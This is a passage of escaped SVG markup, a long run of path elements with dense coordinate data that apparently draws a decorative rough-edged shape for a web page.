d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3